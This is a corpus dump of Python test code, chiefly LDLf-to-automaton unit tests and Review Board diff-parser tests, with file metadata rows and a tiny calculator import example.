always_star_a_ff = PathExpressionAlways(PathExpressionStar(atomic_a), ff)
x = self.ldlf_a.to_nfa(always_star_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([always_star_a_ff])}
states = {frozenset(), frozenset([always_star_a_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000033_alphabet_a_always_star_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000033_alphabet_a_always_star_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_tt(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_star_not_a_tt = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), tt)
x = self.ldlf_a.to_nfa(always_star_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_star_not_a_tt}), frozenset({a}), frozenset()),
(frozenset({always_star_not_a_tt}), frozenset({}), frozenset({always_star_not_a_tt})),
}
final_states = {frozenset(), frozenset([always_star_not_a_tt])}
initial_state = {frozenset([always_star_not_a_tt])}
states = {frozenset(), frozenset([always_star_not_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000034_alphabet_a_always_star_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000034_alphabet_a_always_star_not_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_ff(self):
"""<a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
always_star_a_not_ff = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), ff)
x = self.ldlf_a.to_nfa(always_star_a_not_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([always_star_a_not_ff])}
states = {frozenset(), frozenset([always_star_a_not_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000035_alphabet_a_always_star_not_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000035_alphabet_a_always_star_not_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_a(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
ff = LogicalFalse()
always_star_not_a_a = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), atomic_a)
nnf_always_star_not_a_a = \
PathExpressionAlways(PathExpressionStar(Not(atomic_a)), PathExpressionAlways(Not(atomic_a), ff))
x = self.ldlf_a.to_nfa(always_star_not_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({nnf_always_star_not_a_a}), frozenset(), frozenset({nnf_always_star_not_a_a, ff})),
(frozenset({nnf_always_star_not_a_a}), frozenset({a}), frozenset({})),
}
final_states = {frozenset(), frozenset({nnf_always_star_not_a_a})}
initial_state = {frozenset([nnf_always_star_not_a_a])}
states = {frozenset(), frozenset([nnf_always_star_not_a_a]), frozenset([ff, nnf_always_star_not_a_a])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000036_alphabet_a_always_star_not_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000036_alphabet_a_always_star_not_a_a.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_end(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
ff = LogicalFalse()
always_star_not_a_a = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), End())
nnf_always_star_not_a_a = \
PathExpressionAlways(PathExpressionStar(Not(atomic_a)), PathExpressionAlways(TrueFormula(), ff))
x = self.ldlf_a.to_nfa(always_star_not_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({nnf_always_star_not_a_a}), frozenset(), frozenset({nnf_always_star_not_a_a, ff})),
(frozenset({nnf_always_star_not_a_a}), frozenset({a}), frozenset({ff})),
}
final_states = {frozenset(), frozenset({nnf_always_star_not_a_a})}
initial_state = {frozenset([nnf_always_star_not_a_a])}
states = {frozenset(), frozenset([ff]), frozenset([nnf_always_star_not_a_a]), frozenset([ff, nnf_always_star_not_a_a])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000037_alphabet_a_always_star_not_a_end.NFA", "./tests/automata/nfa")
print_dfa(x, "000037_alphabet_a_always_star_not_a_end.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_abc_starred_sequences(self):
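"""<((a;b*);c)*>end"""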
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
tt = LogicalTrue()
ff = LogicalFalse()
star_b = PathExpressionStar(atomic_b)
# sequence_a_b = PathExpressionSequence(atomic_a, atomic_b)
# star_sequence_a_b = PathExpressionStar(sequence_a_b)
sequence_a_star_b = PathExpressionSequence(atomic_a, star_b)
sequence_abSc = PathExpressionSequence(sequence_a_star_b, atomic_c)
# sequence_abc = PathExpressionSequence(sequence_a_b, atomic_c)
star_seq_abSc = PathExpressionStar(sequence_abSc)
main = PathExpressionEventually(star_seq_abSc, End())
x = self.ldlf_abc.to_nfa(main)
nnf_end = PathExpressionAlways(TrueFormula(), ff)
nnf_main = PathExpressionEventually(star_seq_abSc, nnf_end)
e_star_b_e_c_main = PathExpressionEventually(star_b, PathExpressionEventually(atomic_c, nnf_main))
# pprint(x)
alphabet = {
frozenset(), frozenset([self.a_sym]), frozenset([self.b_sym]), frozenset([self.c_sym]),
frozenset([self.a_sym, self.b_sym]), frozenset([self.a_sym, self.c_sym]), frozenset([self.b_sym, self.c_sym]),
frozenset([self.a_sym, self.b_sym, self.c_sym])
}
states = {
frozenset([nnf_main]),
frozenset([ff]),
frozenset([e_star_b_e_c_main]),
frozenset()
}
initial_states = {
frozenset([nnf_main]),
}
final_states = {
frozenset([nnf_main]),
frozenset()
}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({self.a_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym}), frozenset()),
(frozenset(), frozenset({self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset()),
(frozenset([nnf_main]), frozenset(), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.b_sym, self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({nnf_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.b_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.b_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.b_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
(frozenset([e_star_b_e_c_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({e_star_b_e_c_main})),
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_states)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "001000_alphabet_abc_starred_sequences.NFA", "./tests/automata/nfa")
print_dfa(x, "001000_alphabet_abc_starred_sequences.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_abc_eventually_union_a_star_b_end(self):
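"""<a + b*>end"""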
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
tt = LogicalTrue()
ff = LogicalFalse()
star_b = PathExpressionStar(atomic_b)
main = PathExpressionEventually(PathExpressionUnion(atomic_a, star_b), End())
x = self.ldlf_abc.to_nfa(main)
nnf_end = PathExpressionAlways(TrueFormula(), ff)
nnf_main = PathExpressionEventually(PathExpressionUnion(atomic_a, star_b), nnf_end)
eventually_star_b_end = PathExpressionEventually(star_b, nnf_end)
# pprint(x)
alphabet = {
frozenset(), frozenset([self.a_sym]), frozenset([self.b_sym]), frozenset([self.c_sym]),
frozenset([self.a_sym, self.b_sym]), frozenset([self.a_sym, self.c_sym]), frozenset([self.b_sym, self.c_sym]),
frozenset([self.a_sym, self.b_sym, self.c_sym])
}
states = {
frozenset([nnf_main]),
frozenset([ff]),
frozenset([nnf_end]),
frozenset([eventually_star_b_end]),
frozenset()
}
initial_states = {
frozenset([nnf_main]),
}
final_states = {
frozenset(),
frozenset([nnf_main]),
frozenset([nnf_end]),
frozenset([eventually_star_b_end]),
}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({self.a_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym}), frozenset()),
(frozenset(), frozenset({self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset()),
(frozenset([nnf_main]), frozenset(), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({eventually_star_b_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({eventually_star_b_end})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.a_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.a_sym, self.c_sym}), frozenset({eventually_star_b_end})),
(frozenset([eventually_star_b_end]), frozenset(), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([eventually_star_b_end]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset(), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_states)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "001001_alphabet_abc_eventually_union_a_star_b_end.NFA", "./tests/automata/nfa")
print_dfa(x, "001001_alphabet_abc_eventually_union_a_star_b_end.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_abc_always_union_a_b_end(self):
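"""[a + b]end"""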
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
tt = LogicalTrue()
ff = LogicalFalse()
star_b = PathExpressionStar(atomic_b)
main = PathExpressionAlways(PathExpressionUnion(atomic_a, atomic_b), End())
x = self.ldlf_abc.to_nfa(main)
nnf_end = PathExpressionAlways(TrueFormula(), ff)
nnf_main = PathExpressionAlways(PathExpressionUnion(atomic_a, atomic_b), nnf_end)
eventually_star_b_end = PathExpressionEventually(star_b, nnf_end)
# pprint(x)
alphabet = {
frozenset(), frozenset([self.a_sym]), frozenset([self.b_sym]), frozenset([self.c_sym]),
frozenset([self.a_sym, self.b_sym]), frozenset([self.a_sym, self.c_sym]), frozenset([self.b_sym, self.c_sym]),
frozenset([self.a_sym, self.b_sym, self.c_sym])
}
states = {
frozenset([nnf_main]),
frozenset([ff]),
frozenset([nnf_end]),
frozenset()
}
initial_states = {
frozenset([nnf_main]),
}
final_states = {
frozenset(),
frozenset([nnf_main]),
frozenset([nnf_end]),
}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({self.a_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym}), frozenset()),
(frozenset(), frozenset({self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.b_sym, self.c_sym}), frozenset()),
(frozenset(), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset()),
(frozenset([nnf_main]), frozenset(), frozenset({})),
(frozenset([nnf_main]), frozenset({self.a_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.b_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.c_sym}), frozenset({})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.b_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_main]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({nnf_end})),
(frozenset([nnf_end]), frozenset(), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.b_sym, self.c_sym}), frozenset({ff})),
(frozenset([nnf_end]), frozenset({self.a_sym, self.b_sym, self.c_sym}), frozenset({ff})),
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_states)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "001002_alphabet_abc_always_union_a_b_end.NFA", "./tests/automata")
print_dfa(x, "001002_alphabet_abc_always_union_a_b_end.DFA", "./tests/automata")
def test_sequence_star_annidations(self):
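"""<((a;b)*;c)*>end"""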
atomic_a = AtomicFormula(self.a_sym)
atomic_b = AtomicFormula(self.b_sym)
atomic_c = AtomicFormula(self.c_sym)
# main = PathExpressionEventually(
# PathExpressionStar(
# PathExpressionSequence(
# PathExpressionSequence(atomic_a, PathExpressionStar(atomic_b)),
# atomic_c)),
# End()
# )
main = PathExpressionEventually(
PathExpressionStar(
PathExpressionSequence(
PathExpressionStar(PathExpressionSequence(atomic_a, atomic_b)),
atomic_c),
),
End()
)
x = self.ldlf_abc.to_nfa(main)
# pprint(x)
if self.print_automata:
print_nfa(x, "002003_alphabet_abc_<((a;b)*;c)*>end.NFA", "./tests/automata/dfa")
print_dfa(x, "002003_alphabet_abc_<((a;b)*;c)*>end.DFA", "./tests/automata/nfa")
dfa = _to_pythomata_dfa(x)
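# trace symbols are propositional interpretations: the frozenset of symbols true at that step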
empty = frozenset()
a = frozenset({self.a_sym})
b = frozenset({self.b_sym})
c = frozenset({self.c_sym})
ab = a.union(b)
ac = a.union(c)
bc = b.union(c)
abc = ab.union(c)
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance([]))
self.assertFalse(dfa.word_acceptance([a]))
self.assertFalse(dfa.word_acceptance([b]))
self.assertTrue(dfa.word_acceptance([c]))
self.assertFalse(dfa.word_acceptance([ab]))
self.assertTrue(dfa.word_acceptance([ac]))
self.assertTrue(dfa.word_acceptance([bc]))
self.assertTrue(dfa.word_acceptance([abc]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a, b]))
self.assertTrue(dfa.word_acceptance([a, b, c]))
self.assertFalse(dfa.word_acceptance([a, a, c]))
self.assertFalse(dfa.word_acceptance([a, b, abc, ab]))
self.assertTrue(dfa.word_acceptance([a, b, abc, ab, c]))
| 47.429991 | 159 | 0.629832 | 12,810 | 109,753 | 5.030991 | 0.015379 | 0.117306 | 0.054603 | 0.039102 | 0.918103 | 0.892066 | 0.864183 | 0.812218 | 0.760718 | 0.719242 | 0 | 0.006575 | 0.235037 | 109,753 | 2,313 | 160 | 47.450497 | 0.761044 | 0.020737 | 0 | 0.611915 | 0 | 0 | 0.069199 | 0.032455 | 0 | 0 | 0 | 0 | 0.286192 | 1 | 0.030067 | false | 0 | 0.005011 | 0 | 0.038419 | 0.071826 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1352cceaf1a22adfffeb581e078586c7ee8c0d55 | 7,564 | py | Python | reviewboard/diffviewer/tests/test_diff_parser.py | b1pb1p/reviewboard | b13aca3b88bc16d3c4258adce5df79cd1da577d3 | [
"MIT"
] | null | null | null | reviewboard/diffviewer/tests/test_diff_parser.py | b1pb1p/reviewboard | b13aca3b88bc16d3c4258adce5df79cd1da577d3 | [
"MIT"
] | null | null | null | reviewboard/diffviewer/tests/test_diff_parser.py | b1pb1p/reviewboard | b13aca3b88bc16d3c4258adce5df79cd1da577d3 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from djblets.testing.decorators import add_fixtures
from reviewboard.diffviewer.parser import DiffParser
from reviewboard.testing import TestCase
class DiffParserTest(TestCase):
"""Unit tests for DiffParser."""
def test_form_feed(self):
"""Testing DiffParser with a form feed in the file"""
data = (
b'--- README 123\n'
b'+++ README (new)\n'
b'@@ -1,4 +1,6 @@\n'
b' Line 1\n'
b' Line 2\n'
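# \x0c below is an ASCII form feed; it must be counted as an ordinary inserted line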
b'+\x0c\n'
b'+Inserted line\n'
b' Line 3\n'
b' Line 4\n')
files = DiffParser(data).parse()
self.assertEqual(len(files), 1)
self.assertEqual(files[0].insert_count, 2)
self.assertEqual(files[0].delete_count, 0)
self.assertEqual(files[0].data, data)
def test_line_counts(self):
"""Testing DiffParser with insert/delete line counts"""
diff = (
b'+ This is some line before the change\n'
b'- And another line\n'
b'Index: foo\n'
b'- One last.\n'
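# the +/- lines above precede any file header, so they must not affect the counts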
b'--- README 123\n'
b'+++ README (new)\n'
b'@@ -1,1 +1,1 @@\n'
b'-blah blah\n'
b'-blah\n'
b'+blah!\n'
b'-blah...\n'
b'+blah?\n'
b'-blah!\n'
b'+blah?!\n')
files = DiffParser(diff).parse()
self.assertEqual(len(files), 1)
self.assertEqual(files[0].insert_count, 3)
self.assertEqual(files[0].delete_count, 4)
@add_fixtures(['test_scmtools'])
def test_raw_diff_with_diffset(self):
"""Testing DiffParser.raw_diff with DiffSet"""
repository = self.create_repository(tool_name='Test')
diffset = self.create_diffset(repository=repository)
self.create_diffcommit(
diffset=diffset,
commit_id='r1',
parent_id='r0',
diff_contents=(
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
))
self.create_diffcommit(
diffset=diffset,
commit_id='r2',
parent_id='r1',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 94bdd3e..197009f 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Hi, world!\n'
))
self.create_diffcommit(
diffset=diffset,
commit_id='r4',
parent_id='r3',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 197009f..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hi, world!\n'
b'+Yo, world.\n'
))
cumulative_diff = (
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
b'diff --git a/README b/README\n'
b'index 94bdd3e..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Yo, world.\n'
)
diffset.finalize_commit_series(
cumulative_diff=cumulative_diff,
validation_info=None,
validate=False,
save=True)
parser = DiffParser(b'')
self.assertEqual(parser.raw_diff(diffset), cumulative_diff)
@add_fixtures(['test_scmtools'])
def test_raw_diff_with_diffcommit(self):
"""Testing DiffParser.raw_diff with DiffCommit"""
repository = self.create_repository(tool_name='Test')
diffset = self.create_diffset(repository=repository)
commit1_diff = (
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
b'diff --git a/FOO b/FOO\n'
b'index 84bda3e..b975034 100644\n'
b'--- FOO\n'
b'+++ FOO\n'
b'@@ -1,1 +0,0 @@\n'
b'-Some line\n'
)
commit1 = self.create_diffcommit(
diffset=diffset,
commit_id='r1',
parent_id='r0',
diff_contents=commit1_diff)
self.create_diffcommit(
diffset=diffset,
commit_id='r2',
parent_id='r1',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 94bdd3e..197009f 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Hi, world!\n'
))
self.create_diffcommit(
diffset=diffset,
commit_id='r4',
parent_id='r3',
diff_contents=(
b'diff --git a/README b/README\n'
b'index 197009f..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hi, world!\n'
b'+Yo, world.\n'
))
diffset.finalize_commit_series(
cumulative_diff=(
b'diff --git a/ABC b/ABC\n'
b'index 94bdd3e..197009f 100644\n'
b'--- ABC\n'
b'+++ ABC\n'
b'@@ -1,1 +1,1 @@\n'
b'-line!\n'
b'+line..\n'
b'diff --git a/FOO b/FOO\n'
b'index 84bda3e..b975034 100644\n'
b'--- FOO\n'
b'+++ FOO\n'
b'@@ -1,1 +0,0 @@\n'
b'-Some line\n'
b'diff --git a/README b/README\n'
b'index 94bdd3e..87abad9 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -1,1 +1,1 @@\n'
b'-Hello, world!\n'
b'+Yo, world.\n'
),
validation_info=None,
validate=False,
save=True)
parser = DiffParser(b'')
self.assertEqual(parser.raw_diff(commit1), commit1_diff)
def test_extra_data(self):
"""Testing custom DiffParser populating extra_data"""
class CustomParser(DiffParser):
def parse_diff_header(self, linenum, info):
info['extra_data'] = {'foo': True}
return super(CustomParser, self).parse_diff_header(
linenum, info)
diff = (
b'+ This is some line before the change\n'
b'- And another line\n'
b'Index: foo\n'
b'- One last.\n'
b'--- README 123\n'
b'+++ README (new)\n'
b'@@ -1,1 +1,1 @@\n'
b'-blah blah\n'
b'-blah\n'
b'+blah!\n'
b'-blah...\n'
b'+blah?\n'
b'-blah!\n'
b'+blah?!\n')
files = CustomParser(diff).parse()
self.assertEqual(len(files), 1)
self.assertEqual(files[0].extra_data, {'foo': True})
| 31.648536 | 67 | 0.448572 | 903 | 7,564 | 3.665559 | 0.126246 | 0.065257 | 0.021752 | 0.048943 | 0.763746 | 0.763746 | 0.725076 | 0.725076 | 0.725076 | 0.700302 | 0 | 0.061723 | 0.404548 | 7,564 | 238 | 68 | 31.781513 | 0.673179 | 0.033977 | 0 | 0.803828 | 0 | 0 | 0.274327 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.028708 | false | 0 | 0.019139 | 0 | 0.062201 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1375e404f3a394c4bbb56eca2978c554563a8d94 | 83 | py | Python | imports/calc_import.py | yusabana-sandbox/python-practice | 1698bf4979a1e09fe166ac36507c363f95564eeb | [
"MIT"
] | null | null | null | imports/calc_import.py | yusabana-sandbox/python-practice | 1698bf4979a1e09fe166ac36507c363f95564eeb | [
"MIT"
] | null | null | null | imports/calc_import.py | yusabana-sandbox/python-practice | 1698bf4979a1e09fe166ac36507c363f95564eeb | [
"MIT"
] | null | null | null | # vim: fileencoding=utf-8
import calc
print(calc.add(1, 2))
print(calc.sub(1, 2))
